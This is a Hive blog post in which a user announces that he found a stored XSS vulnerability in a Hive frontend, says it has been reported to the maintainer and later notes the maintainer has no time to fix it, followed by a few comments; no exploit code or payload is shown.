XSS vulnerability in one of the Hive frontends

avatar
(Edited)
Not sure which pic to
choose for this article. This..


OR this one.. 🙂
Pics taken from "Humorous programming books by @ThePracticalDev"




I was just browsing around Hive and decided to navigate to the Dapps section to see if anything cool came out.

I attended HiveFest on Friday (my pics here!) and heard about a frontend that got me intrigued. I decided to check it out and noticed that the styling was off in some places.

That got me thinking that if the devs rushed things out from a design perspective, they probably also didn't give too much thought to Security.

I tried a few tricks in my hats and managed to store some (harmless) code in the Hive blockchain that now gets executed by all users visiting some specific content using that Frontend.

image.png




A couple of months back I did a tech talk in my company about some security vulnerabilities I found in 3 different internal systems that my employer uses to manage employees' resumes, store performance reviews, and train their employees.

Here is one of the slides I used with a summary of how dangerous an XSS vulnerability can be:

Screen Shot 20201221 at 1.19.06 AM.png




The vulnerability has now been reported to the site maintainer. More details will follow once it's fixed.

I'll express my opinion on the effectiveness of the fix and the team response time.




Some more funny pics because these (fake) books are too funny..
🙂

     


UPDATES:

28/12/2020: it looks like @louis88 reported another XSS in the same website weeks ago.

The maintainer at the moment does not have time to fix the issue:

"Just overwhelmed for almost 9 months with COVID stuff so that I have no time for anything else..."

Community members may be able to work on it since the repository is open source. Stay tuned for updates.


By @gaottantacinque / @keys-defender 🔑



0
0
0.000
8 comments
avatar

Security is hard. That's why I'm happy not being a web developer. I work on systems that are often off-line or out of sight.

0
0
0.000
avatar
(Edited)

.

0
0
0.000
avatar
(Edited)

@crokkon Yep, it was me (@gaottantacinque) that reported the XSS in not one but 2 block explorers. All my disclosed vulnerabilities got timely fixed so far.

——-


0
0
0.000
avatar

Congratulations @gaottantacinque! You have completed the following achievement on the Hive blockchain and have been rewarded with new badge(s) :

You received more than 1000 as payout for your posts. Your next target is to reach a total payout of 2000

You can view your badges on your board and compare yourself to others in the Ranking
If you no longer want to receive notifications, reply to this comment with the word STOP

0
0
0.000